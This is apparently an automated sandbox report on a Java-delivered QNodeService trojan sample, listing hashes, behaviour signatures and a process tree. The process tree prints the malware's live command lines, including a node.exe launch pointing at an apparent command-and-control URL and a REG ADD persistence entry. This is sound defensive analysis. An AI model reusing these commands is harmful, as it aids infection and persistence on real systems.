Analysis
-
max time kernel
134s -
max time network
152s -
platform
windows10_x64 -
resource
win10 -
submitted
10-07-2020 07:36
Static task
static1
Behavioral task
behavioral1
Sample
New Order.jar
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
New Order.jar
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
New Order.jar
-
Size
11KB
-
MD5
69ef667c7532f2270c7fce0248204de8
-
SHA1
5068591969676356606cab476c5a97e6931cf10a
-
SHA256
ef3d46672b76fdf902c7baa81c07dc16f30b32953983dfb774988b10fea826cd
-
SHA512
99cfaf53c551bee15d8c020380dc5fab4f268e8d1b635d26495c8e19c53fe57c187820149a23bbd60ddf166d34980d7be80dedbb33387d131ba67f5fbc7b293f
Score
10/10
Malware Config
Signatures
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3608 wrote to memory of 60 3608 java.exe 68 PID 3608 wrote to memory of 60 3608 java.exe 68 PID 60 wrote to memory of 1272 60 node.exe 69 PID 60 wrote to memory of 1272 60 node.exe 69 PID 1272 wrote to memory of 1332 1272 cmd.exe 70 PID 1272 wrote to memory of 1332 1272 cmd.exe 70 PID 60 wrote to memory of 1468 60 node.exe 71 PID 60 wrote to memory of 1468 60 node.exe 71 -
Executes dropped EXE 2 IoCs
pid Process 60 node.exe 1468 node.exe -
Loads dropped DLL 4 IoCs
pid Process 1468 node.exe 1468 node.exe 1468 node.exe 1468 node.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1468 node.exe 1468 node.exe -
QNodeService NodeJS Trojan 1 IoCs
resource yara_rule behavioral2/files/0x000100000001bfee-118.dat family_qnodeservice -
Adds Run entry to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\qnodejs-a6331eee = "cmd /D /C \"C:\\Users\\Admin\\qnodejs-node-v13.13.0-win-x64\\qnodejs\\qnodejs-a6331eee.cmd\"" reg.exe -
QNodeService
is a trojan written in NodeJS and spread via Java downloader. Utilizes stealer functionality.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 11 wtfismyip.com 12 wtfismyip.com
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\New Order.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:3608 -
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:[email protected] --register-startup --central-base-url https://bonny.accesscam.org2⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:60 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-a6331eee" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-a6331eee.cmd\"""3⤵
- Suspicious use of WriteProcessMemory
PID:1272 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-a6331eee" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-a6331eee.cmd\""4⤵
- Adds Run entry to start application
PID:1332
-
-
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:[email protected] --register-startup --central-base-url https://bonny.accesscam.org3⤵
- Checks processor information in registry
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1468
-
-